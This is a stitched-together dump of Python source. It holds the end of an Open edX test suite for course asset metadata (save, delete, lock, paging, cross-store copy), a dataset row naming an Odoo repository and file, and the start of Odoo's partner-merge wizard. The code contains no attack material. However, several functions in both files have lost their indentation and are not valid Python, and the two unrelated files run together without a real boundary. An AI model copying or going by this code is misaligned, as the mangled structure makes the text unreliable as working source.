            self.assertEquals(store.delete_asset_metadata(new_asset_loc, ModuleStoreEnum.UserID.test), 0)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 0)
            # Save, then delete for real: returns 1 deleted and empties the listing.
            new_asset_md = self._make_asset_metadata(new_asset_loc)
            store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
            self.assertEquals(store.delete_asset_metadata(new_asset_loc, ModuleStoreEnum.UserID.test), 1)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 0)
@ddt.data(*MODULESTORE_SETUPS)
def test_find_non_existing_assets(self, storebuilder):
"""
Find a non-existent asset in an existing course.
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
# Find existing asset metadata.
asset_md = store.find_asset_metadata(new_asset_loc)
self.assertIsNone(asset_md)
@ddt.data(*MODULESTORE_SETUPS)
def test_get_all_non_existing_assets(self, storebuilder):
"""
Get all assets in an existing course when no assets exist.
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
# Find existing asset metadata.
asset_md = store.get_all_asset_metadata(course.id, 'asset')
self.assertEquals(asset_md, [])
    @ddt.data(*MODULESTORE_SETUPS)
    def test_find_assets_in_non_existent_course(self, storebuilder):
        """
        Find asset metadata from a non-existent course.
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            # Derive a course id that cannot exist from the real one.
            fake_course_id = CourseKey.from_string("{}nothere/{}nothere/{}nothere".format(
                course.id.org, course.id.course, course.id.run
            ))
            new_asset_loc = fake_course_id.make_asset_key('asset', 'burnside.jpg')
            # Both lookup APIs must raise for a missing course.
            with self.assertRaises(ItemNotFoundError):
                store.find_asset_metadata(new_asset_loc)
            with self.assertRaises(ItemNotFoundError):
                store.get_all_asset_metadata(fake_course_id, 'asset')
    @ddt.data(*MODULESTORE_SETUPS)
    def test_add_same_asset_twice(self, storebuilder):
        """
        Add an asset's metadata, then add it again: the second save must not duplicate it.
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
            new_asset_md = self._make_asset_metadata(new_asset_loc)
            # Add asset metadata.
            store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 1)
            # Add *the same* asset metadata.
            store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
            # Still one here?
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 1)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_different_asset_types(self, storebuilder):
        """
        Test saving assets with other asset types.
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            new_asset_loc = course.id.make_asset_key('vrml', 'pyramid.vrml')
            new_asset_md = self._make_asset_metadata(new_asset_loc)
            # Add asset metadata.
            store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
            # The asset is listed under its own type only, not under 'asset'.
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'vrml')), 1)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 0)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_asset_types_with_other_field_names(self, storebuilder):
        """
        Test saving assets using an asset type of 'course_id' — a name that
        could clash with internal field names — still works.
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            new_asset_loc = course.id.make_asset_key('course_id', 'just_to_see_if_it_still_works.jpg')
            new_asset_md = self._make_asset_metadata(new_asset_loc)
            # Add asset metadata.
            store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'course_id')), 1)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 0)
            all_assets = store.get_all_asset_metadata(course.id, 'course_id')
            self.assertEquals(all_assets[0].asset_id.path, new_asset_loc.path)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_lock_unlock_assets(self, storebuilder):
        """
        Toggle an asset's locked flag via set_asset_metadata_attr and verify it round-trips both ways.
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
            new_asset_md = self._make_asset_metadata(new_asset_loc)
            store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
            locked_state = new_asset_md.locked
            # Flip the course asset's locked status.
            store.set_asset_metadata_attr(new_asset_loc, "locked", not locked_state, ModuleStoreEnum.UserID.test)
            # Find the same course and check its locked status.
            updated_asset_md = store.find_asset_metadata(new_asset_loc)
            self.assertIsNotNone(updated_asset_md)
            self.assertEquals(updated_asset_md.locked, not locked_state)
            # Now flip it back.
            store.set_asset_metadata_attr(new_asset_loc, "locked", locked_state, ModuleStoreEnum.UserID.test)
            reupdated_asset_md = store.find_asset_metadata(new_asset_loc)
            self.assertIsNotNone(reupdated_asset_md)
            self.assertEquals(reupdated_asset_md.locked, locked_state)
ALLOWED_ATTRS = (
('pathname', '/new/path'),
('internal_name', 'new_filename.txt'),
('locked', True),
('contenttype', 'image/png'),
('thumbnail', 'new_filename_thumb.jpg'),
('fields', {'md5': '5346682d948cc3f683635b6918f9b3d0'}),
('curr_version', 'v1.01'),
('prev_version', 'v1.0'),
('edited_by', 'Mork'),
('edited_on', datetime(1969, 1, 1, tzinfo=pytz.utc)),
)
DISALLOWED_ATTRS = (
('asset_id', 'IAmBogus'),
('created_by', 'Smith'),
('created_on', datetime.now(pytz.utc)),
)
UNKNOWN_ATTRS = (
('lunch_order', 'burger_and_fries'),
('villain', 'Khan')
)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_set_all_attrs(self, storebuilder):
        """
        Set each attr in ALLOWED_ATTRS one at a time and verify it sticks.
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
            new_asset_md = self._make_asset_metadata(new_asset_loc)
            store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
            for attribute, value in self.ALLOWED_ATTRS:
                # Set the course asset's attribute.
                store.set_asset_metadata_attr(new_asset_loc, attribute, value, ModuleStoreEnum.UserID.test)
                # Find the same course asset and check its changed attribute.
                updated_asset_md = store.find_asset_metadata(new_asset_loc)
                self.assertIsNotNone(updated_asset_md)
                self.assertIsNotNone(getattr(updated_asset_md, attribute, None))
                self.assertEquals(getattr(updated_asset_md, attribute, None), value)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_set_disallowed_attrs(self, storebuilder):
        """
        Setting disallowed attrs must be silently ignored (value unchanged).
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
            new_asset_md = self._make_asset_metadata(new_asset_loc)
            store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
            for attribute, value in self.DISALLOWED_ATTRS:
                original_attr_val = getattr(new_asset_md, attribute)
                # Set the course asset's attribute.
                store.set_asset_metadata_attr(new_asset_loc, attribute, value, ModuleStoreEnum.UserID.test)
                # Find the same course and check its changed attribute.
                updated_asset_md = store.find_asset_metadata(new_asset_loc)
                self.assertIsNotNone(updated_asset_md)
                self.assertIsNotNone(getattr(updated_asset_md, attribute, None))
                # Make sure that the attribute is unchanged from its original value.
                self.assertEquals(getattr(updated_asset_md, attribute, None), original_attr_val)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_set_unknown_attrs(self, storebuilder):
        """
        Setting unknown attrs must not add new fields to the metadata.
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
            new_asset_md = self._make_asset_metadata(new_asset_loc)
            store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
            for attribute, value in self.UNKNOWN_ATTRS:
                # Set the course asset's attribute.
                store.set_asset_metadata_attr(new_asset_loc, attribute, value, ModuleStoreEnum.UserID.test)
                # Find the same course and check its changed attribute.
                updated_asset_md = store.find_asset_metadata(new_asset_loc)
                self.assertIsNotNone(updated_asset_md)
                # Make sure the unknown field was *not* added.
                with self.assertRaises(AttributeError):
                    self.assertEquals(getattr(updated_asset_md, attribute), value)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_save_one_different_asset(self, storebuilder):
        """
        saving and deleting things which are not 'asset' (here: type 'different')
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            asset_key = course.id.make_asset_key('different', 'burn.jpg')
            new_asset_thumbnail = self._make_asset_thumbnail_metadata(
                self._make_asset_metadata(asset_key)
            )
            store.save_asset_metadata(new_asset_thumbnail, ModuleStoreEnum.UserID.test)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'different')), 1)
            # delete returns the number of deleted assets.
            self.assertEquals(store.delete_asset_metadata(asset_key, ModuleStoreEnum.UserID.test), 1)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'different')), 0)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_find_different(self, storebuilder):
        """
        finding things which are of type other than 'asset'
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            asset_key = course.id.make_asset_key('different', 'burn.jpg')
            new_asset_thumbnail = self._make_asset_thumbnail_metadata(
                self._make_asset_metadata(asset_key)
            )
            store.save_asset_metadata(new_asset_thumbnail, ModuleStoreEnum.UserID.test)
            # Saved key is found; an unsaved key of the same type is not.
            self.assertIsNotNone(store.find_asset_metadata(asset_key))
            unknown_asset_key = course.id.make_asset_key('different', 'nosuchfile.jpg')
            self.assertIsNone(store.find_asset_metadata(unknown_asset_key))
def _check_asset_values(self, assets, orig):
"""
Check asset type/path values.
"""
for idx, asset in enumerate(orig):
self.assertEquals(assets[idx].asset_id.asset_type, asset[0])
self.assertEquals(assets[idx].asset_id.path, asset[1])
    @ddt.data(*MODULESTORE_SETUPS)
    def test_get_multiple_types(self, storebuilder):
        """
        getting all things which are of type other than 'asset'
        """
        # pylint: disable=bad-continuation
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            # Save 'em.
            for asset_type, filename in self.alls:
                asset_key = course.id.make_asset_key(asset_type, filename)
                new_asset = self._make_asset_thumbnail_metadata(
                    self._make_asset_metadata(asset_key)
                )
                store.save_asset_metadata(new_asset, ModuleStoreEnum.UserID.test)
            # Check 'em.
            for asset_type, asset_list in (
                ('different', self.differents),
                ('vrml', self.vrmls),
                ('asset', self.regular_assets),
            ):
                assets = store.get_all_asset_metadata(course.id, asset_type)
                self.assertEquals(len(assets), len(asset_list))
                self._check_asset_values(assets, asset_list)
            # An unknown type lists nothing; asset_type=None lists all 4 assets.
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'not_here')), 0)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, None)), 4)
            assets = store.get_all_asset_metadata(
                course.id, None, start=0, maxresults=-1,
                sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
            )
            self.assertEquals(len(assets), len(self.alls))
            self._check_asset_values(assets, self.alls)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_save_metadata_list(self, storebuilder):
        """
        Save a list of asset metadata all at once (via save_asset_metadata_list),
        then verify retrieval filtered by type and unfiltered.
        """
        # pylint: disable=bad-continuation
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            # Make a list of AssetMetadata objects.
            md_list = []
            for asset_type, filename in self.alls:
                asset_key = course.id.make_asset_key(asset_type, filename)
                md_list.append(self._make_asset_thumbnail_metadata(
                    self._make_asset_metadata(asset_key)
                ))
            # Save 'em in a single bulk call.
            store.save_asset_metadata_list(md_list, ModuleStoreEnum.UserID.test)
            # Check 'em: same expectations as saving one-by-one.
            for asset_type, asset_list in (
                ('different', self.differents),
                ('vrml', self.vrmls),
                ('asset', self.regular_assets),
            ):
                assets = store.get_all_asset_metadata(course.id, asset_type)
                self.assertEquals(len(assets), len(asset_list))
                self._check_asset_values(assets, asset_list)
            # NOTE(review): 4 presumably equals len(self.alls) — confirm fixtures.
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'not_here')), 0)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, None)), 4)
            assets = store.get_all_asset_metadata(
                course.id, None, start=0, maxresults=-1,
                sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
            )
            self.assertEquals(len(assets), len(self.alls))
            self._check_asset_values(assets, self.alls)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_save_metadata_list_with_mismatched_asset(self, storebuilder):
        """
        Save a list of asset metadata all at once - but with one asset's metadata
        from a different course. The mismatched assets must NOT appear in the
        first course's results.
        """
        # pylint: disable=bad-continuation
        with storebuilder.build() as (__, store):
            course1 = CourseFactory.create(modulestore=store)
            course2 = CourseFactory.create(modulestore=store)
            # Make a list of AssetMetadata objects; the 'asset'-typed ones are
            # deliberately keyed to course2 instead of course1.
            md_list = []
            for asset_type, filename in self.alls:
                if asset_type == 'asset':
                    asset_key = course2.id.make_asset_key(asset_type, filename)
                else:
                    asset_key = course1.id.make_asset_key(asset_type, filename)
                md_list.append(self._make_asset_thumbnail_metadata(
                    self._make_asset_metadata(asset_key)
                ))
            # Save 'em.
            store.save_asset_metadata_list(md_list, ModuleStoreEnum.UserID.test)
            # Check 'em: only the course1-keyed types are present for course1.
            for asset_type, asset_list in (
                ('different', self.differents),
                ('vrml', self.vrmls),
            ):
                assets = store.get_all_asset_metadata(course1.id, asset_type)
                self.assertEquals(len(assets), len(asset_list))
                self._check_asset_values(assets, asset_list)
            self.assertEquals(len(store.get_all_asset_metadata(course1.id, 'asset')), 0)
            self.assertEquals(len(store.get_all_asset_metadata(course1.id, None)), 3)
            assets = store.get_all_asset_metadata(
                course1.id, None, start=0, maxresults=-1,
                sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
            )
            self.assertEquals(len(assets), len(self.differents + self.vrmls))
            self._check_asset_values(assets, self.differents + self.vrmls)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_delete_all_different_type(self, storebuilder):
        """
        deleting all assets of a given but not 'asset' type
        """
        # NOTE(review): despite the name and docstring, this test only saves a
        # 'different'-typed asset and asserts it is retrievable — no delete call
        # is ever made. Confirm whether a delete_all step is missing here.
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            asset_key = course.id.make_asset_key('different', 'burn_thumb.jpg')
            new_asset_thumbnail = self._make_asset_thumbnail_metadata(
                self._make_asset_metadata(asset_key)
            )
            store.save_asset_metadata(new_asset_thumbnail, ModuleStoreEnum.UserID.test)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'different')), 1)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_get_all_assets_with_paging(self, storebuilder):
        """
        Exercise get_all_asset_metadata paging: page through 5 assets two at a
        time under four different sort specs, fetch everything at once, and
        probe edge conditions (start past the end, maxresults 0 and negative).
        """
        with storebuilder.build() as (__, store):
            course1 = CourseFactory.create(modulestore=store)
            course2 = CourseFactory.create(modulestore=store)
            self.setup_assets(course1.id, course2.id, store)
            # Each entry: (sort spec, expected full ordering of the 5 filenames,
            # expected result count for each of the 3 pages of size 2).
            expected_sorts_by_2 = (
                (
                    ('displayname', ModuleStoreEnum.SortOrder.ascending),
                    ('code.tgz', 'demo.swf', 'dog.png', 'roman_history.pdf', 'weather_patterns.bmp'),
                    (2, 2, 1)
                ),
                (
                    ('displayname', ModuleStoreEnum.SortOrder.descending),
                    ('weather_patterns.bmp', 'roman_history.pdf', 'dog.png', 'demo.swf', 'code.tgz'),
                    (2, 2, 1)
                ),
                (
                    ('uploadDate', ModuleStoreEnum.SortOrder.ascending),
                    ('code.tgz', 'dog.png', 'roman_history.pdf', 'weather_patterns.bmp', 'demo.swf'),
                    (2, 2, 1)
                ),
                (
                    ('uploadDate', ModuleStoreEnum.SortOrder.descending),
                    ('demo.swf', 'weather_patterns.bmp', 'roman_history.pdf', 'dog.png', 'code.tgz'),
                    (2, 2, 1)
                ),
            )
            # First, with paging across all sorts.
            for sort_test in expected_sorts_by_2:
                for i in xrange(3):
                    asset_page = store.get_all_asset_metadata(
                        course2.id, 'asset', start=2 * i, maxresults=2, sort=sort_test[0]
                    )
                    num_expected_results = sort_test[2][i]
                    expected_filename = sort_test[1][2 * i]
                    self.assertEquals(len(asset_page), num_expected_results)
                    self.assertEquals(asset_page[0].asset_id.path, expected_filename)
                    if num_expected_results == 2:
                        expected_filename = sort_test[1][(2 * i) + 1]
                        self.assertEquals(asset_page[1].asset_id.path, expected_filename)
            # Now fetch everything.
            asset_page = store.get_all_asset_metadata(
                course2.id, 'asset', start=0, sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
            )
            self.assertEquals(len(asset_page), 5)
            self.assertEquals(asset_page[0].asset_id.path, 'code.tgz')
            self.assertEquals(asset_page[1].asset_id.path, 'demo.swf')
            self.assertEquals(asset_page[2].asset_id.path, 'dog.png')
            self.assertEquals(asset_page[3].asset_id.path, 'roman_history.pdf')
            self.assertEquals(asset_page[4].asset_id.path, 'weather_patterns.bmp')
            # Some odd conditions.
            # start beyond the collection → empty page.
            asset_page = store.get_all_asset_metadata(
                course2.id, 'asset', start=100, sort=('uploadDate', ModuleStoreEnum.SortOrder.ascending)
            )
            self.assertEquals(len(asset_page), 0)
            # maxresults == 0 → empty page.
            asset_page = store.get_all_asset_metadata(
                course2.id, 'asset', start=3, maxresults=0,
                sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
            )
            self.assertEquals(len(asset_page), 0)
            # negative maxresults → "no limit": the 2 remaining assets after start=3.
            asset_page = store.get_all_asset_metadata(
                course2.id, 'asset', start=3, maxresults=-12345,
                sort=('displayname', ModuleStoreEnum.SortOrder.descending)
            )
            self.assertEquals(len(asset_page), 2)
    @ddt.data(XmlModulestoreBuilder(), MixedModulestoreBuilder([('xml', XmlModulestoreBuilder())]))
    def test_xml_not_yet_implemented(self, storebuilder):
        """
        Test coverage which shows that for now xml read operations are not implemented:
        the XML modulestore returns None / an empty list instead of asset metadata.
        """
        with storebuilder.build(contentstore=None) as (__, store):
            course_key = store.make_course_key("org", "course", "run")
            asset_key = course_key.make_asset_key('asset', 'foo.jpg')
            self.assertEquals(store.find_asset_metadata(asset_key), None)
            self.assertEquals(store.get_all_asset_metadata(course_key, 'asset'), [])
    @ddt.data(*MODULESTORE_SETUPS)
    def test_copy_all_assets_same_modulestore(self, storebuilder):
        """
        Create a course with assets, copy them all to another course in the same modulestore, and check on it.
        """
        with storebuilder.build() as (__, store):
            course1 = CourseFactory.create(modulestore=store)
            course2 = CourseFactory.create(modulestore=store)
            self.setup_assets(course1.id, None, store)
            self.assertEquals(len(store.get_all_asset_metadata(course1.id, 'asset')), 2)
            self.assertEquals(len(store.get_all_asset_metadata(course2.id, 'asset')), 0)
            store.copy_all_asset_metadata(course1.id, course2.id, ModuleStoreEnum.UserID.test * 101)
            # Source course keeps its assets; destination now has copies.
            self.assertEquals(len(store.get_all_asset_metadata(course1.id, 'asset')), 2)
            all_assets = store.get_all_asset_metadata(
                course2.id, 'asset', sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
            )
            self.assertEquals(len(all_assets), 2)
            self.assertEquals(all_assets[0].asset_id.path, 'pic1.jpg')
            self.assertEquals(all_assets[1].asset_id.path, 'shout.ogg')
    @ddt.data(*MODULESTORE_SETUPS)
    def test_copy_all_assets_from_course_with_no_assets(self, storebuilder):
        """
        Create a course with *no* assets, and try copy them all to another course
        in the same modulestore: the copy must be a no-op, not an error.
        """
        with storebuilder.build() as (__, store):
            course1 = CourseFactory.create(modulestore=store)
            course2 = CourseFactory.create(modulestore=store)
            store.copy_all_asset_metadata(course1.id, course2.id, ModuleStoreEnum.UserID.test * 101)
            self.assertEquals(len(store.get_all_asset_metadata(course1.id, 'asset')), 0)
            self.assertEquals(len(store.get_all_asset_metadata(course2.id, 'asset')), 0)
            all_assets = store.get_all_asset_metadata(
                course2.id, 'asset', sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
            )
            self.assertEquals(len(all_assets), 0)
    @ddt.data(
        ('mongo', 'split'),
        ('split', 'mongo'),
    )
    @ddt.unpack
    def test_copy_all_assets_cross_modulestore(self, from_store, to_store):
        """
        Create a course with assets, copy them all to another course in a
        different modulestore (mongo <-> split, both directions), and check on it.
        """
        mixed_builder = MIXED_MODULESTORE_BOTH_SETUP
        with mixed_builder.build() as (__, mixed_store):
            with mixed_store.default_store(from_store):
                course1 = CourseFactory.create(modulestore=mixed_store)
            with mixed_store.default_store(to_store):
                course2 = CourseFactory.create(modulestore=mixed_store)
            self.setup_assets(course1.id, None, mixed_store)
            self.assertEquals(len(mixed_store.get_all_asset_metadata(course1.id, 'asset')), 2)
            self.assertEquals(len(mixed_store.get_all_asset_metadata(course2.id, 'asset')), 0)
            mixed_store.copy_all_asset_metadata(course1.id, course2.id, ModuleStoreEnum.UserID.test * 102)
            all_assets = mixed_store.get_all_asset_metadata(
                course2.id, 'asset', sort=('displayname', ModuleStoreEnum.SortOrder.ascending)
            )
            self.assertEquals(len(all_assets), 2)
            self.assertEquals(all_assets[0].asset_id.path, 'pic1.jpg')
            self.assertEquals(all_assets[1].asset_id.path, 'shout.ogg')
| agpl-3.0 |
akhmadMizkat/odoo | addons/crm/base_partner_merge.py | 9 | 30876 | #!/usr/bin/env python
from __future__ import absolute_import
from email.utils import parseaddr
import functools
import htmlentitydefs
import itertools
import logging
import operator
import psycopg2
import re
from ast import literal_eval
from openerp.exceptions import ValidationError
from openerp.tools import mute_logger
# Validation Library https://pypi.python.org/pypi/validate_email/1.1
from .validate_email import validate_email
import openerp
from openerp.osv import osv, orm
from openerp.osv import fields
from openerp.osv.orm import browse_record
from openerp.tools.translate import _
from openerp.exceptions import UserError
pattern = re.compile("&(\w+?);")
_logger = logging.getLogger('base.partner.merge')
# http://www.php2python.com/wiki/function.html-entity-decode/
def html_entity_decode_char(m, defs=htmlentitydefs.entitydefs):
    """Return the replacement text for one HTML-entity regex match *m*:
    the decoded character when the entity name is known, otherwise the
    original ``&name;`` text unchanged."""
    return defs.get(m.group(1), m.group(0))
def html_entity_decode(string):
    """Replace every ``&name;`` HTML entity in *string* with its decoded
    character; unknown entities are left untouched."""
    decoded = pattern.sub(html_entity_decode_char, string)
    return decoded
def sanitize_email(email):
    """
    Split a raw email field into a list of validated, lower-cased addresses.

    After HTML-entity decoding, ``;``, ``/`` and ``:`` are normalized to
    commas and the field is split; each whitespace-separated token is run
    through ``parseaddr`` and kept only when ``validate_email`` accepts it.
    """
    assert isinstance(email, basestring) and email
    decoded = html_entity_decode(email or '')
    chunks = re.subn(r';|/|:', ',', decoded)[0].split(',')
    candidates = [parseaddr(token)[1]
                  for chunk in chunks
                  for token in chunk.split()]
    return [candidate.lower()
            for candidate in candidates
            if validate_email(candidate)]
def is_integer_list(ids):
    """Return True when every element of *ids* is an int (or long)."""
    for item in ids:
        if not isinstance(item, (int, long)):
            return False
    return True
class ResPartner(osv.Model):
    """Expose the technical columns ``id`` and ``create_date`` read-only on
    res.partner so the merge wizard can display and order on them."""
    _inherit = 'res.partner'
    _columns = {
        'id': fields.integer('Id', readonly=True),
        'create_date': fields.datetime('Create Date', readonly=True),
    }
class MergePartnerLine(osv.TransientModel):
    """One group of potential duplicate partners found by the wizard.

    ``aggr_ids`` stores the textual representation of the duplicate id list
    and ``min_id`` the smallest id of the group (used for ordering)."""
    _name = 'base.partner.merge.line'
    _columns = {
        'wizard_id': fields.many2one('base.partner.merge.automatic.wizard',
                                     'Wizard'),
        'min_id': fields.integer('MinID'),
        'aggr_ids': fields.char('Ids', required=True),
    }
    _order = 'min_id asc'
class MergePartnerAutomatic(osv.TransientModel):
    """
    The idea behind this wizard is to create a list of potential partners to
    merge. We use two objects, the first one is the wizard for the end-user.
    And the second will contain the partner list to merge.
    """
    _name = 'base.partner.merge.automatic.wizard'
    _columns = {
        # Group by: which fields define "duplicate" for the SQL grouping.
        'group_by_email': fields.boolean('Email'),
        'group_by_name': fields.boolean('Name'),
        'group_by_is_company': fields.boolean('Is Company'),
        'group_by_vat': fields.boolean('VAT'),
        'group_by_parent_id': fields.boolean('Parent Company'),
        # Wizard workflow state: option -> selection -> finished.
        'state': fields.selection([('option', 'Option'),
                                   ('selection', 'Selection'),
                                   ('finished', 'Finished')],
                                  'State',
                                  readonly=True,
                                  required=True),
        'number_group': fields.integer("Group of Contacts", readonly=True),
        'current_line_id': fields.many2one('base.partner.merge.line', 'Current Line'),
        'line_ids': fields.one2many('base.partner.merge.line', 'wizard_id', 'Lines'),
        'partner_ids': fields.many2many('res.partner', string='Contacts'),
        'dst_partner_id': fields.many2one('res.partner', string='Destination Contact'),
        # Exclusion switches: skip groups referenced by users / journal items.
        'exclude_contact': fields.boolean('A user associated to the contact'),
        'exclude_journal_item': fields.boolean('Journal Items associated to the contact'),
        'maximum_group': fields.integer("Maximum of Group of Contacts"),
    }
    def default_get(self, cr, uid, fields, context=None):
        """When launched from a res.partner selection, pre-fill the wizard in
        'selection' state with the selected partners and pick the preferred
        merge destination (last of _get_ordered_partner)."""
        if context is None:
            context = {}
        res = super(MergePartnerAutomatic, self).default_get(cr, uid, fields, context)
        if context.get('active_model') == 'res.partner' and context.get('active_ids'):
            partner_ids = context['active_ids']
            res['state'] = 'selection'
            res['partner_ids'] = partner_ids
            res['dst_partner_id'] = self._get_ordered_partner(cr, uid, partner_ids, context=context)[-1].id
        return res
    _defaults = {
        'state': 'option'
    }
    def get_fk_on(self, cr, table):
        """Run (on ``cr``) a catalog query listing every (table, column) pair
        holding a single-column foreign key that references ``<table>.id``.

        The caller retrieves the rows with ``cr.fetchall()``; note that
        ``cr.execute`` returns None, so this method's return value carries no
        information.
        """
        q = """  SELECT cl1.relname as table,
                        att1.attname as column
                 FROM pg_constraint as con, pg_class as cl1, pg_class as cl2,
                      pg_attribute as att1, pg_attribute as att2
                 WHERE con.conrelid = cl1.oid
                     AND con.confrelid = cl2.oid
                     AND array_lower(con.conkey, 1) = 1
                     AND con.conkey[1] = att1.attnum
                     AND att1.attrelid = cl1.oid
                     AND cl2.relname = %s
                     AND att2.attname = 'id'
                     AND array_lower(con.confkey, 1) = 1
                     AND con.confkey[1] = att2.attnum
                     AND att2.attrelid = cl2.oid
                     AND con.contype = 'f'
        """
        return cr.execute(q, (table,))
def _update_foreign_keys(self, cr, uid, src_partners, dst_partner, context=None):
_logger.debug('_update_foreign_keys for dst_partner: %s for src_partners: %r', dst_partner.id, list(map(operator.attrgetter('id'), src_partners)))
# find the many2one relation to a partner
proxy = self.pool.get('res.partner')
self.get_fk_on(cr, 'res_partner')
# ignore two tables
for table, column in cr.fetchall():
if 'base_partner_merge_' in table:
continue
partner_ids = tuple(map(int, src_partners))
query = "SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%s'" % (table)
cr.execute(query, ())
columns = []
for data in cr.fetchall():
if data[0] != column:
columns.append(data[0])
query_dic = {
'table': table,
'column': column,
'value': columns[0],
}
if len(columns) <= 1:
# unique key treated
query = """
UPDATE "%(table)s" as ___tu
SET %(column)s = %%s
WHERE
%(column)s = %%s AND
NOT EXISTS (
SELECT 1
FROM "%(table)s" as ___tw
WHERE
%(column)s = %%s AND
___tu.%(value)s = ___tw.%(value)s
)""" % query_dic
for partner_id in partner_ids:
cr.execute(query, (dst_partner.id, partner_id, dst_partner.id))
else:
try:
with mute_logger('openerp.sql_db'), cr.savepoint():
query = 'UPDATE "%(table)s" SET %(column)s = %%s WHERE %(column)s IN %%s' % query_dic
cr.execute(query, (dst_partner.id, partner_ids,))
if column == proxy._parent_name and table == 'res_partner':
query = """
WITH RECURSIVE cycle(id, parent_id) AS (
SELECT id, parent_id FROM res_partner
UNION
SELECT cycle.id, res_partner.parent_id
FROM res_partner, cycle
WHERE res_partner.id = cycle.parent_id AND
cycle.id != cycle.parent_id
)
SELECT id FROM cycle WHERE id = parent_id AND id = %s
"""
cr.execute(query, (dst_partner.id,))
except psycopg2.Error:
# updating fails, most likely due to a violated unique constraint
# keeping record with nonexistent partner_id is useless, better delete it
query = 'DELETE FROM %(table)s WHERE %(column)s = %%s' % query_dic
cr.execute(query, (partner_id,))
    def _update_reference_fields(self, cr, uid, src_partners, dst_partner, context=None):
        """
        Repoint ORM-level references (records that store 'res.partner,<id>' or
        a (model, res_id) pair) from each of ``src_partners`` to
        ``dst_partner``: known generic-reference models first, then every
        ir.model.fields entry of type 'reference'.
        """
        _logger.debug('_update_reference_fields for dst_partner: %s for src_partners: %r', dst_partner.id, list(map(operator.attrgetter('id'), src_partners)))
        def update_records(model, src, field_model='model', field_id='res_id', context=None):
            # Rewrite (field_model, field_id) pairs pointing at src; if the
            # write violates a constraint, drop the rows instead of keeping
            # references to a partner that is about to be unlinked.
            proxy = self.pool.get(model)
            if proxy is None:
                return
            domain = [(field_model, '=', 'res.partner'), (field_id, '=', src.id)]
            ids = proxy.search(cr, openerp.SUPERUSER_ID, domain, context=context)
            try:
                with mute_logger('openerp.sql_db'), cr.savepoint():
                    return proxy.write(cr, openerp.SUPERUSER_ID, ids, {field_id: dst_partner.id}, context=context)
            except psycopg2.Error:
                # updating fails, most likely due to a violated unique constraint
                # keeping record with nonexistent partner_id is useless, better delete it
                return proxy.unlink(cr, openerp.SUPERUSER_ID, ids, context=context)
        update_records = functools.partial(update_records, context=context)
        for partner in src_partners:
            update_records('calendar', src=partner, field_model='model_id.model')
            update_records('ir.attachment', src=partner, field_model='res_model')
            update_records('mail.followers', src=partner, field_model='res_model')
            update_records('mail.message', src=partner)
